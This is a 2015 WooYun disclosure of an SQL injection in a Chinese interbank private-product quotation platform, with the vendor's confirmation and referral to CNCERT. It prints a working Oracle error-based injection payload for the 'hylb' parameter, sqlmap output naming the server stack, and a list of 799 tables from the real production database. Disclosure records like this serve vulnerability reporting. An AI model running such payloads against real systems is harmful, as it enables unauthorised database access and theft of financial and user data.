当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147742

漏洞标题:中证机构间报价系统漏洞

相关厂商:中证机构间报价系统股份有限公司

漏洞作者: 路人甲

提交时间:2015-10-22 09:15

修复时间:2015-12-11 08:22

公开时间:2015-12-11 08:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

SQL注入

详细说明:

机构间私募产品报价与服务系统(简称“报价系统”),是经中国证监会批准设立的为机构投资者提供私募产品报价、发行、转让及相关服务的专业化电子平台。

QQ拼音截图未命名.jpg


Payload: http://**.**.**.**:80/lm/trzcs.do?hylb=-6673 OR 9874=CTXSYS.DRITHSX.SN(9874,(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9874=9874) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)))-- Nhol21=6 AND 965=965&lmIndex=cyyq

QQ截图20151019111905.png


QQ截图20151019113128.png


QQ图片20151019113354.png


可登录系统:

QQ截图20151019123530.png

漏洞证明:

Parameter: #1* (URI)
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: http://**.**.**.**:80/lm/trzcs.do?hylb=-6673 OR 9874=CTXSYS.DRITHSX.SN(9874,(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9874=9874) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)))-- Nhol21=6 AND 965=965&lmIndex=cyyq
Parameter: #2* (URI)
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: http://**.**.**.**:80/lm/trzcs.do?hylb=-4331 OR 4830=CTXSYS.DRITHSX.SN(4830,(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (4830=4830) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)))-- Snpf1=6 AND 965=965&lmIndex=cyyq
---
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #2*, type: Unescaped numeric (default)
[1] place: URI, parameter: #1*, type: Unescaped numeric
[q] Quit
> [11:15:12] [INFO] the back-end DBMS is Oracle
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: Servlet 2.5, JSP 2.1, Apache 2.2.15
back-end DBMS: Oracle
[11:15:12] [INFO] fetching tables for database: 'LIVEBOS'
[11:15:13] [INFO] the SQL query used returns 799 entries
Database: LIVEBOS
[799 tables]
+-------------------------------+
| A |
| ADDRESSCATEGORY |
| B |
| BMZX_BMXX |
| C |
| CPBM |
| CZYHYWLB |
| DW_CURRENT_STEP |
| DW_HISTORY_STEP |
| DW_STEP_OWNER |
| DW_WFENTRY |
| EBS_ORDERHIS |
| EXO_GROUP |
| EXO_MEMBERSHIP |
| EXO_MEMBERSHIP_TYPE |
| EXO_NODE_NAVIGATION |
| EXO_PAGE |
| EXO_PORTAL_CONFIG |
| EXO_SERVICE_CONFIG |
| EXO_SESSION_LOG |
| EXO_USER |
| EXO_USER_PROFILE |
| FLCPUB_ISSUE_JYCS_PSF |
| FLCZJ_JSZH_PLJX |
| HYXX_200 |
| LBAGILEABNORMALINSTANCE |
| LBAGILEABNORMALINSTMANAGER |
| LBAGILECURRENTSTEP |
| LBAGILEI18NRESOURCE |
| LBAGILEMANAGERDETAILINFO |
| LBAGILEWFENTRYIDREF |
| LBAGILEWFENTRYSCHEMEREF |
| LBAGILEWFMANAGEDINFO |
| LBAGILEWFRTNOFITYINFO |
| LBAGILEWFRTNOTIFYOWNER |
| LBAGILEWFRTREASSIGNINFO |
| LBAGILEWFRTSTEPPROPERTY |
| LBAGILEWFRUNTIMEBASEINFO |
| LBAGILEWFRUNTIMECONDITION |
| LBAGILEWFRUNTIMEMANAGER |
| LBAGILEWFRUNTIMEPROP |
| LBAGILEWFRUNTIMESTEP |
| LBAGILEWFRUNTIMEVARIABLE |
| LBAGILEWFSCHEMERTDEF |
| LBAGILEWFSTEPRTCONDITION |
| LBAGILEWFSTEPRUNTIMEACTION |
| LBAGILEWFSTEPRUNTIMECOLUMN |
| LBAGILEWFSTEPRUNTIMECOMMAND |
| LBAGILEWFSTEPRUNTIMEFUN |
| LBAGILEWFSTEPTIMEOUTPROCESS |
| LBAGILEWORKFLOWCATEGORY |
| LBAGILEWORKFLOWDEF |
| LBAGILEWORKFLOWIDMAP |
| LBAGILEWORKFLOWMANAGER |
| LBAGILEWORKFLOWRUNTIMEDEF |
| LBAUTH |
| LBAUTHSCOPE |
| LBBIZFUNCTIONDEFS |
| LBBIZPROCESSDEFS |
| LBBULLETIN |
| LBCIPHER |
| LBCLUSTERMEMBER |
| LBCOLUMNPERMISSION |
| LBDATASCOPEAUTH |
| LBDEVELOPLOG |
| LBDIRECTMESSAGE |
| LBFEEDCOMMENT |
| LBFEEDEVENT |
| LBFEEDEVENTTYPE |
| LBFEEDFAVORITE |
| LBFEEDFILE |
| LBFEEDGROUPHOME |
| LBFEEDMENTION |
| LBFEEDMESSAGE |
| LBFEEDMSGGROUP |
| LBFEEDMSGGROUPMEMBER |
| LBFEEDMSGTEMPLATE |
| LBFEEDOPTIONS |
| LBFEEDTOPIC |
| LBFEEDTOPICUSER |
| LBFUNAUDITSCOPE |
| LBFUNAUTHLOG |
| LBFUNDEFINITION |
| LBFUNFACTOR |
| LBFUNPERMISSION |
| LBFUNPERMISSIONSCOPE |
| LBGROUP |
| LBGROUPMEMBER |
| LBHISTORYAGILEWORKFLOWDEF |
| LBHISTORYBIZPROCESSDEFS |
| LBHISTORYMESSAGE |
| LBHISTORYWORKOWNERPARAM |
| LBHISTORYWORKVARIABLE |
| LBKMAUTH |
| LBKMCOMMENTRATING |
| LBKMDIRECTORY |
| LBKMUSERCONTRIBUTE |
| LBKMUSERFAVORITE |
| LBKMUSERFOLLOW |
| LBKNOWLEDGE |
| LBKNOWLEDGECOMMENT |
| LBKNOWLEDGEPROPERTIES |
| LBKNOWLEDGERATE |
| LBMAIL |
| LBMAILFOLDER |
| LBMANAGESCOPE |
| LBMEMBER |
| LBMENUPORTLET |
| LBMENUPORTLETCATEGORY |
| LBMESSAGESENDER |
| LBMETACOLUMN |
| LBMETACOLUMNVALIDATOR |
| LBNAVPAGE |
| LBNEWSATTACHMENT |
| LBNEWSCLASS |
| LBNOTIFICATION |
| LBNOTIFICATIONOBJECT |
| LBNOTIFICATIONOBJECTOPERATE |
| LBNOTIFICATIONOPERATES |
| LBNOTIFICATIONUSER |
| LBOBJECTDEFS |
| LBOBJECTPERMISSION |
| LBOBJSTATISTIC |
| LBOPERATESTATISTIC |
| LBORGANIZATION |
| LBREPORTFAVORITE |
| LBREPORTFILE |
| LBREPORTPUBLISHSCHEDULE |
| LBREPORTSETTING |
| LBREPORTSUBSCRIBE |
| LBREPORTUSAGE |
| LBRESOURCEBUNDLE |
| LBROLE |
| LBROLECATEGORY |
| LBROLEMUTEX |
| LBROLESCOPE |
| LBSCHEDULEREFOBJ |
| LBSCHEDULEREFOPTION |
| LBSCHEDULEVIEW |
| LBSCHEDULEVIEWOPTION |
| LBSCOPEFACTOR |
| LBSCOPEPERMISSION |
| LBSEARCHINDEXEX |
| LBSESSIONLOCKTICKET |
| LBSURROGATE |
| LBSURROGATETRUST |
| LBSYSCONFIG |
| LBSYSVARIABLE |
| LBTASK |
| LBTASKATTACHMENT |
| LBTASKATTACHMENTHIT |
| LBTASKAUDITINFO |
| LBTASKDEFS |
| LBTASKDEFSI18N |
| LBTASKFEEDBACK |
| LBTASKFEEDBACKRECIPIENT |
| LBTASKTAG |
| LBTASKUSER |
| LBTASKUSERTAG |
| LBTICKETREGISTRY |
| LBUSERFEED |
| LBUSERFEEDSUMMARY |
| LBUSERFOLLOWING |
| LBUSERMSGCHANNEL |
| LBUSERPROJECT |
| LBUSERPROJECTCONFIG |
| LBUSERWORKFLOWMSG |
| LBWEBSERVICESESSION |
| LBWFCURRENTOWNER |
| LBWFDEFS_I18N |
| LBWFNOTIFY |
| LBWFNOTIFYMSG |
| LBWFSTEPRUNTIMEOWNER |
| LBWORKACTIONSTATISTIC |
| LBWORKCALENDAR |
| LBWORKCOMMUNICATION |
| LBWORKCOMMUOWNER |
| LBWORKFLOWCONDITIONDEF |
| LBWORKFLOWDEF |
| LBWORKFLOWHISTORYDEF |
| LBWORKFLOWMANAGERDEF |
| LBWORKFLOWPROPERTY |
| LBWORKFLOWSTEPDEF |
| LBWORKFLOWSTEPFUNDEF |
| LBWORKFLOWSTEPOWNERDEF |
| LBWORKFLOWSUITCONDITIONDEF |
| LBWORKOWNERPARAM |
| LBWORKSTATISTIC |
| LBWORKVARIABLE |
| LCDJ_MFQLC_CJ |
| LCDJ_MFQLC_LHJ |
| LCDJ_MFQLC_YXJ |
| LCJYDYXXZX |
| LCOTC_BBJDBGSQ |
| LCOTC_BBJDBGSQ_SPJL |
| LCOTC_BBNJCLSQ |
| LCOTC_BBNJCLSQ_SPJL |
| LCOTC_BCXY |
| LCOTC_BCXY_THJL |
| LCOTC_CFJLBD |
| LCOTC_CFJLBD_SPJL |
| LCOTC_CFJLCXBD |
| LCOTC_CFJLCXBD_SPJL |
| LCOTC_CJXM |
| LCOTC_CONTRACT |
| LCOTC_CONTRACT_SPYJ |
| LCOTC_CPDJ_LC |
| LCOTC_CPDJ_LC_BAK |
| LCOTC_CPDJ_LC_CJ |
| LCOTC_CPDJ_LC_LHJ |
| LCOTC_CPDJ_LC_SPJL |
| LCOTC_CPDJ_LC_YXJ |
| LCOTC_CPDJ_SG |
| LCOTC_CPDJ_SG_BAK |
| LCOTC_CPDJ_SG_SPJL |
| LCOTC_CPDJ_SZ |
| LCOTC_CPDJ_SZ_BAK |
| LCOTC_CPDJ_SZ_GSXX |
| LCOTC_CPDJ_SZ_SPJL |
| LCOTC_CPDJ_YL |
| LCOTC_CPDJ_YL_SPJL |
| LCOTC_CPDJ_YS |
| LCOTC_CPDJ_YS_BAK |
| LCOTC_CPDJ_YS_SPJL |
| LCOTC_CPDJ_ZZ |
| LCOTC_CPDJ_ZZ_GSXX |
| LCOTC_CPDJ_ZZ_SPJL |
| LCOTC_CPFBXXCX |
| LCOTC_CPFBXXCX_SPJL |
| LCOTC_CPFBXXXG |
| LCOTC_CPFBXXXG_SPJL |
| LCOTC_CPJD |
| LCOTC_CPJD_BAK |
| LCOTC_CPJD_SPJL |
| LCOTC_CPXG_LC |
| LCOTC_CPXG_LCDJ |
| LCOTC_CPXG_LCDJ_SPJL |
| LCOTC_CPXG_LC_SPJL |
| LCOTC_CPXG_SG |
| LCOTC_CPXG_SGDJ |
| LCOTC_CPXG_SGDJ_SPJL |
| LCOTC_CPXG_SG_SPJL |
| LCOTC_CPXG_SZ |
| LCOTC_CPXG_SZDJ |
| LCOTC_CPXG_SZDJ_GSXX |
| LCOTC_CPXG_SZDJ_SPJL |
| LCOTC_CPXG_SZ_GSXX |
| LCOTC_CPXG_SZ_SPJL |
| LCOTC_CPXG_YS |
| LCOTC_CPXG_YSDJ |
| LCOTC_CPXG_YSDJ_SPJL |
| LCOTC_CPXG_YS_SPJL |
| LCOTC_CPXG_ZZ |
| LCOTC_CPXG_ZZDJ |
| LCOTC_CPXG_ZZDJ_GSXX |
| LCOTC_CPXG_ZZDJ_SPJL |
| LCOTC_CPXG_ZZ_GSXX |
| LCOTC_CPXG_ZZ_SPJL |
| LCOTC_CPXXFB |
| LCOTC_CPXXFB_BAK |
| LCOTC_CPXXFB_SPJL |
| LCOTC_CPZC_GQJJ |
| LCOTC_CPZC_GQJJ_SPJL |
| LCOTC_CPZC_GQZC |
| LCOTC_CPZC_GQZC_SPJL |
| LCOTC_CPZC_LC |
| LCOTC_CPZC_LC_BAK |
| LCOTC_CPZC_LC_SPJL |
| LCOTC_CPZC_QYSG |
| LCOTC_CPZC_QYSG_SPJL |
| LCOTC_CPZC_SG |
| LCOTC_CPZC_SG_BAK |
| LCOTC_CPZC_SG_SPJL |
| LCOTC_CPZC_SYPZ |
| LCOTC_CPZC_SYPZ_SPJL |
| LCOTC_CPZC_SZ |
| LCOTC_CPZC_SZ_BAK |
| LCOTC_CPZC_SZ_GSXX |
| LCOTC_CPZC_SZ_SPJL |
| LCOTC_CPZC_XMGQ |
| LCOTC_CPZC_XMGQ_SPJL |
| LCOTC_CPZC_YS |
| LCOTC_CPZC_YS_BAK |
| LCOTC_CPZC_YS_SPJL |
| LCOTC_CPZC_ZCZCZQ |
| LCOTC_CPZC_ZCZCZQ_SPJL |
| LCOTC_CPZC_ZGCP |
| LCOTC_CPZC_ZGCP_SPJL |
| LCOTC_CPZC_ZQJJ |
| LCOTC_CPZC_ZQJJ_SPJL |
| LCOTC_CPZC_ZZ |
| LCOTC_CPZC_ZZ_GSXX |
| LCOTC_CPZC_ZZ_SPJL |
| LCOTC_CPZG |
| LCOTC_CPZG_BAK |
| LCOTC_CPZG_SPJL |
| LCOTC_CPZH_CPZHZTBG_SPJL |
| LCOTC_CPZH_SQ |
| LCOTC_CPZH_SQ_SPJL |
| LCOTC_CPZH_XH |
| LCOTC_CPZH_XH_SPJL |
| LCOTC_CPZH_ZTBG |
| LCOTC_CPZX |
| LCOTC_CPZX_BAK |
| LCOTC_CPZX_SPJL |
| LCOTC_CZYH |
| LCOTC_CZYH_SPJL |
| LCOTC_DQBGBD |
| LCOTC_DQBGBD_SPJL |
| LCOTC_FXJLBD |
| LCOTC_FXJLBD_SPJL |
| LCOTC_FXJLCXBD |
| LCOTC_FXJLCXBD_SPJL |
| LCOTC_HGCL |
| LCOTC_HYHFZZSQBD |
| LCOTC_HYHFZZSQBD_SPJL |
| LCOTC_HYJH |
| LCOTC_HYJH_SPJL |
| LCOTC_HYQXBD |
| LCOTC_HYQXBD_SPJL |
| LCOTC_HYSJ |
| LCOTC_HYSJ_SPJL |
| LCOTC_HYTCZZSQBD |
| LCOTC_HYTCZZSQBD_SPJL |
| LCOTC_HYXXXGBD |
| LCOTC_HYXXXGBDN |
| LCOTC_HYXXXGBDN_GDHHR |
| LCOTC_HYXXXGBDN_SPJL |
| LCOTC_HYXXXGBDN_SSXH |
| LCOTC_HYXXXGBDN_ZYRYXX |
| LCOTC_HYXXXGBD_SPJL |
| LCOTC_HYZC |
| LCOTC_HYZCN |
| LCOTC_HYZCN_GDHHR |
| LCOTC_HYZCN_SPJL |
| LCOTC_HYZCN_SSXH |
| LCOTC_HYZCN_YHXGZG |
| LCOTC_HYZCN_ZSSYR |
| LCOTC_HYZCN_ZYRYXX |
| LCOTC_HYZC_SPJL |
| LCOTC_JCCP_LC |
| LCOTC_JCCP_LC_SPJL |
| LCOTC_JLJLBD |
| LCOTC_JLJLBD_SPJL |
| LCOTC_JLJLCXBD |
| LCOTC_JLJLCXBD_SPJL |
| LCOTC_JYQRS |
| LCOTC_JYQRS_THJL |
| LCOTC_JYQRS_XQCS |
| LCOTC_JYZZ |
| LCOTC_JYZZ_THJL |
| LCOTC_LSBGBD |
| LCOTC_LSBGBD_SPJL |
| LCOTC_LYBZXY |
| LCOTC_LYBZXY_THJL |
| LCOTC_LYSQ |
| LCOTC_LYSQ_SPJL |
| LCOTC_NJCLBS |
| LCOTC_NJCLBS_SPJL |
| LCOTC_PZGL_HF |
| LCOTC_PZGL_HF_BAK |
| LCOTC_PZGL_HF_SPJL |
| LCOTC_PZGL_ZG |
| LCOTC_PZGL_ZG_BAK |
| LCOTC_PZGL_ZG_SPJL |
| LCOTC_QTXY |
| LCOTC_QYZXY |
| LCOTC_QYZXY_SFJL |
| LCOTC_QYZXY_THJL |
| LCOTC_SZZS |
| LCOTC_SZZS_SPJL |
| LCOTC_SZZS_ZSSYR |
| LCOTC_TJLYXXSQ |
| LCOTC_TJLYXXSQ_SPJL |
| LCOTC_TSJLBD |
| LCOTC_TSJLBD_SPJL |
| LCOTC_TSJLCXBD |
| LCOTC_TSJLCXBD_SPJL |
| LCOTC_XMGQ_XY |
| LCOTC_XMGQ_XY_THJL |
| LCOTC_XMGQ_ZRYX |
| LCOTC_XMGQ_ZRYX_SHYJ |
| LCOTC_XYPJBD |
| LCOTC_XYPJBD_SPJL |
| LCOTC_XYPJCXBD |
| LCOTC_XYPJCXBD_SPJL |
| LCOTC_YSPJYQR |
| LCOTC_YSPJYQRS |
| LCOTC_YSPJYQRS_THJL |
| LCOTC_YSPJYQR_SQJL |
| LCOTC_YSPJYQR_THYY |
| LCOTC_YSPZXY |
| LCOTC_YSPZXY_SQJL |
| LCOTC_YSPZXY_THYY |
| LCOTC_YWBG |
| LCOTC_YWBG_SPJL |
| LCOTC_ZJZH_SQ |
| LCOTC_ZJZH_SQ_SPJL |
| LCOTC_ZJZH_XH |
| LCOTC_ZJZH_XH_SPJL |
| LCOTC_ZJZH_ZTBG |
| LCOTC_ZJZH_ZTBG_SPJL |
| LCPUB_CPZC_TA |
| LCPUB_CPZC_TA_DXJG |
| LCPUB_CPZC_TA_SPJL |
| LC_APTITUDE_FUN |
| LC_APTITUDE_FUN_SPJL |
| LC_MEMBER_PURVIEW |
| LC_MEMBER_PURVIEW_SPJL |
| LSSJ |
| OS_CURRENTSTEP |
| OS_CURRENTSTEP_PREV |
| OS_HISTORYSTEP |
| OS_HISTORYSTEP_PREV |
| OS_HISTORYWORKFLOWDEFS |
| OS_PROPERTYENTRY |
| OS_WFENTRY |
| OS_WORKFLOWDEFS |
| PORTLET |
| PORTLET_CATEGORY |
| PORTLET_ROLE |
| PUB_FIELDTYPE |
| PUB_OBJECTTYPE |
| PUB_OPERATELOG |
| PUB_OPERATION |
| PUB_OPERATION_FBAKSET |
| PUB_SYSLIST |
| QMTJ |
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_JOB_LISTENERS |
| QRTZ_LOCKS |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_TRIGGERS |
| QRTZ_TRIGGER_LISTENERS |
| RESOURCE_BUNDLE_DATA |
| SZDJ_MFQLC_FGSXX |
| SZ_MFQLC_FGSXX |
| SZ_MZCTJ_FGSXX |
| T165 |
| T185 |
| TAUTH |
| TAUTHAREA |
| TBLOG |
| TBLOGCOMMENT |
| TBONDINFO |
| TCACHE |
| TCALENDAR |
| TCATEGORYINFO |
| TCH_WTSB_WGD_YSP |
| TCMDDEF |
| TCMDOPER |
| TCMDRESTRICT |
| TCMDVALIDATE |
| TCONFIRM |
| TCPGGW |
| TCPXXWH |
| TCUSTOMSERIAL |
| TCUSTUMOPERATE |
| TC_BILATERAL_CLEAR_TRADE |
| TDJ_CPFE_CON |
| TDJ_CPYE_BF |
| TDJ_TACJRZ |
| TDJ_YJBCLS |
| TDJ_ZHLJSY |
| TDJ_ZHSYLS |
| TDRAWINGITEMS_RULE |
| TEMPLET_BAK |
| TFIELDDIC |
| TFIELDMAP |
| TFIELDVALIDATOR |
| TFP_CPDM_DXPLFW_BAK |
| TFP_CPZXFL |
| TFUNDINFO |
| TGAME_RESULT |
| TGGW |
| TIDSERIAL |
| TINVESTOR_STATUS |
| TLIMITPARAMMAP |
| TLIVEBOSSTUDIOINFO |
| TLMXCXX |
| TMENU |
| TMESREFOBJ |
| TMESSAGE |
| TOBJMODE |
| TOPERATEAUDIT |
| TOPERLOG |
| TOTC_APPDLYZ |
| TOTC_BAHY |
| TOTC_BATCH |
| TOTC_BATCH_ATT |
| TOTC_BCXY |
| TOTC_BCXY_BAK |
| TOTC_BDBMK |
| TOTC_BDLX |
| TOTC_BDQX |
| TOTC_BJJSFZGL |
| TOTC_CDQXPZ |
| TOTC_CDQXS |
| TOTC_CFJL |
| TOTC_CONTRACT_CLASS |
| TOTC_CONTRACT_CLASS_DETAIL |
| TOTC_CONTRACT_OBJECT |
| TOTC_CONTRACT_TYPE_CODE |
| TOTC_CONTRACT_VARIETY |
| TOTC_CPBM |
| TOTC_CPBMHDGL |
| TOTC_CPBMHDGL_BAK |
| TOTC_CPBMJLB |
| TOTC_CPBMJLB_BAK_20140630 |
| TOTC_CPBM_20140703 |
| TOTC_CPBM_BAK |
| TOTC_CPBM_BAK_20140630 |
| TOTC_CPBM_DJXGLS |
| TOTC_CPBM_DJXGLS_BAK_20140630 |
| TOTC_CPBM_GJZJY |
| TOTC_CPBM_INIT |
| TOTC_CPBM_INIT_DJXX |
| TOTC_CPBM_SLJL |
| TOTC_CPDJ_YHLC |
| TOTC_CPFL |
| TOTC_CPFL_BAK |
| TOTC_CPJZ_BAK |
| TOTC_CPLC |
| TOTC_CPSP |
| TOTC_CPSXPZ |
| TOTC_CPZCBD |
| TOTC_CPZHXEGL |
| TOTC_CZRZ |
| TOTC_DCWJ_JG |
| TOTC_DHWJ_BASE |
| TOTC_DHWJ_BASEANSWER |
| TOTC_DOWNCLASS |
| TOTC_DQBG |
| TOTC_DXJL |
| TOTC_DXLS |
| TOTC_DXXY |
| TOTC_DXYZM |
| TOTC_EJH |
| TOTC_EJLB |
| TOTC_EWJYSJ |
| TOTC_EXTSYSTEM |
| TOTC_FHYJGBMDJ |
| TOTC_FHYJGBMDJ_BAK |
| TOTC_FSTJYW |
| TOTC_FXJL |
| TOTC_FZHYZCDLRZ |
| TOTC_GDHHR |
| TOTC_GJDM |
| TOTC_GLFS |
| TOTC_GSJJ |
| TOTC_GTBSQK_TEMP |
| TOTC_GTCP_SBMX |
| TOTC_GTFX |
| TOTC_GTHY |
| TOTC_HGCL |
| TOTC_HQLX |
| TOTC_HYCXXX |
| TOTC_HYDLQX |
| TOTC_HYDLRZ |
| TOTC_HYFL |
| TOTC_HYHC |
| TOTC_HYJB |
| TOTC_HYJHLS |
| TOTC_HYJSPZ |
| TOTC_HYJSPZ_BAK |
| TOTC_HYLBYS |
| TOTC_HYXX |
| TOTC_HYXXXG_LS |
| TOTC_HYXXX_20150507 |
| TOTC_HYXX_20140820 |
| TOTC_HYXX_IMP |
| TOTC_HYXX_TEMP |
| TOTC_HYXX_TEST |
| TOTC_INDUSTRY |
| TOTC_INFOSEND |
| TOTC_JBXX |
| TOTC_JCZCZL |
| TOTC_JDBGCS |
| TOTC_JGBM |
| TOTC_JGBMK |
| TOTC_JGDMD |
| TOTC_JGXXWH |
| TOTC_JHXY |
| TOTC_JLJL |
| TOTC_JSFS |
| TOTC_JYCSB |
| TOTC_JYQRS |
| TOTC_JYQRS_BAK |
| TOTC_JYZZ |
| TOTC_LCJK |
| TOTC_LCLX |
| TOTC_LMCY |
| TOTC_LMFW |
| TOTC_LMFW_FL |
| TOTC_LMGL |
| TOTC_LSBG |
| TOTC_LSYGTYH |
| TOTC_LSZHZC |
| TOTC_LYBZXY |
| TOTC_LYBZZH |
| TOTC_LYCYJB |
| TOTC_LYHDGL |
| TOTC_LYJBGL |
| TOTC_LYWSJLB |
| TOTC_LYXXB |
| TOTC_LYXXGL |
| TOTC_NJCS |
| TOTC_NJDA |
| TOTC_OUTSYS_MEMEXT |
| TOTC_OUTSYS_RESULT |
| TOTC_PZLXB |
| TOTC_PZXXB |
| TOTC_QMS |
| TOTC_QQJG |
| TOTC_QSGT_XPFL |
| TOTC_QTXY |
| TOTC_QYBMD |
| TOTC_QYGPQYFL |
| TOTC_QYGPZC |
| TOTC_QYGPZC_GQJG |
| TOTC_QYSC_JRZC |
| TOTC_SBQSCJRZ |
| TOTC_SCBXW |
| TOTC_SCBXW_ATTACHMENT |
| TOTC_SCBXW_CLASS |
| TOTC_SCBXW_COMMENTS |
| TOTC_SMHCPFL |
| TOTC_SMTHY |
| TOTC_SSXH |
| TOTC_SXL |
| TOTC_SZDBFS |
| TOTC_SZFXFW |
| TOTC_SZZSSQ |
| TOTC_TCPEGL |
| TOTC_TMFL |
| TOTC_TPZB |
| TOTC_TSJL |
| TOTC_TZAL |
| TOTC_TZBD |
| TOTC_TZCL |
| TOTC_TZCPLX |
| TOTC_TZDXFXYW |
| TOTC_TZRXXWH |
| TOTC_TZTD |
| TOTC_TZZYD |
| TOTC_TZZYD_ATTACHMENT |
| TOTC_TZZYD_CLASS |
| TOTC_TZZYD_COMMENTS |
| TOTC_UKDY_JYLS |
| TOTC_UKEYIC |
| TOTC_UKEY_CAPTCHA |
| TOTC_WEBLCZX |
| TOTC_WEBLCZX_BAK |
| TOTC_WEBXX |
| TOTC_WEBXX_ATTACHMENT |
| TOTC_WEBXX_CLASS |
| TOTC_WEBXX_COMMENTS |
| TOTC_WEBXX_MK |
| TOTC_WEBXX_XGSP |
| TOTC_WTZCZL |
| TOTC_WZSL |
| TOTC_XGLJ |
| TOTC_XGLJ_CLASS |
| TOTC_XGLM |
| TOTC_XGYWZG |
| TOTC_XMGL_BAK |
| TOTC_XMGQXY |
| TOTC_XTJSPZ |
| TOTC_XXPLFL |
| TOTC_XXTX |
| TOTC_XYFQ |
| TOTC_XYPJ |
| TOTC_XYQY |
| TOTC_XZQYDM |
| TOTC_XZZX |
| TOTC_XZZX_CLASS |
| TOTC_YGHYDLRZ |
| TOTC_YGTQD |
| TOTC_YGYH |
| TOTC_YHGTGX |
| TOTC_YJLB |
| TOTC_YSPBCXY |
| TOTC_YSPJYQRS |
| TOTC_YSPZXY |
| TOTC_YWLB |
| TOTC_YWQXPZ |
| TOTC_YWQXZZQD |
| TOTC_YXBBJDBG_LS |
| TOTC_YXBBNJCL_LS |
| TOTC_ZDSXJBXX |
| TOTC_ZFZH |
| TOTC_ZMXW |
| TOTC_ZMXW_ATTACHMENT |
| TOTC_ZMXW_CLASS |
| TOTC_ZMXW_COMMENTS |
| TOTC_ZMXW_FBHSP |
| TOTC_ZQCPLX |
| TOTC_ZQGS_GGW |
| TOTC_ZQGS_XXFB |
| TOTC_ZQGS_XXFBN |
| TOTC_ZQJGLX |
| TOTC_ZSSYR |
| TOTC_ZSXY |
| TOTC_ZSYW |
| TOTC_ZTHY |
| TOTC_ZTHYLM |
| TOTC_ZTJJ |
| TOTC_ZXPXKCB |
| TOTC_ZXPXKCB_KCDG |
| TOTC_ZXY |
| TOTC_ZXYGZLZD |
| TOTC_ZXYLSSJ |
| TOTC_ZXYLSSJJG |
| TOTC_ZXYLSSJJG_BAK |
| TOTC_ZXY_BAK |
| TOTC_ZYHXX |
| TOTC_ZYHXX_20150507 |
| TOTC_ZYRYXX |
| TOTC_ZYRZ_CZRZ |
| TOTC_ZYRZ_DQHG |
| TOTC_ZYRZ_TQZZ |
| TOTC_ZYRZ_WYJL |
| TOTC_ZZCZRZ |
| TOUTOBJ |
| TPRIZE_RESULT |
| TPRIZE_SET |
| TPUB_CPLB |
| TPUB_CPLB_SXXX |
| TPUB_DATASOURCE |
| TPUB_EXU_SET |
| TPUB_SETP_SET |
| TQMENT |
| TQMENT_ANSWER |
| TQUERYCONDITION |
| TQUERYFIELD |
| TQUERYGROUP |
| TQUERYLINK |
| TQUERYORDER |
| TQUERYREF |
| TRECEIVERMES |
| TRECYCLE |
| TRECYCLETYPE |
| TRELATIONOBJ |
| TROLE |
| TROUND |
| TSCHEDULE |
| TSCHEDULEAUDIT |
| TSCHEDULEDEF |
| TSCHEDULEOPTION |
| TSCHEDULEPARTICIPATOR |
| TSCORE_DETAIL |
| TSCORE_FUNCTION |
| TSEQUENCE |
| TSTRUCTUREDPRODUCT |
| TSTRUCTUREDSCHEMA |
| TST_ZHGX |
| TSYCSKZ |
| TSYSDBBACK |
| TSYSPARAM |
| TTABLE |
| TTABLEHISTORY |
| TTABLEOBJ |
| TTABLEOBJHISTORY |
| TTRANS |
| TTRANSFERCOMMISSIONCFM |
| TUSER |
| TUSERLOG |
| TUSERPREFERENCES |
| TUSER_20150507 |
| TVIEWCONDITION |
| TVIEWOBJ |
| TVIEWOBJHISTORY |
| TXTDM |
| TXTDM_I18N |
| TZJ_WBJSZH_CS |
| T_APTITUDE_FUN |
| T_AUTOMESS |
| T_DR |
| T_FUNCTION |
| T_FUNCTION_TREE |
| T_MEMBER_APTITUDE |
| T_MEMBER_PURVIEW |
| T_MEMBER_USER_PURVIEW |
| T_OPERATE_LOG |
| T_USERTYPE_DEFAULT |
| T_USERTYPE_PERMISS |
| T_USERTYPE_PURVIEW |
| WF_INITIATOR |
| XTQMTJ |
| ZJHMYH |
| ZZDJ_MFQLC_FGSXX |
| ZZLBTEMP |
| ZZ_MFQLC_FGSXX |
+-------------------------------+

修复方案:

过滤相关参数

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-10-27 08:20

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无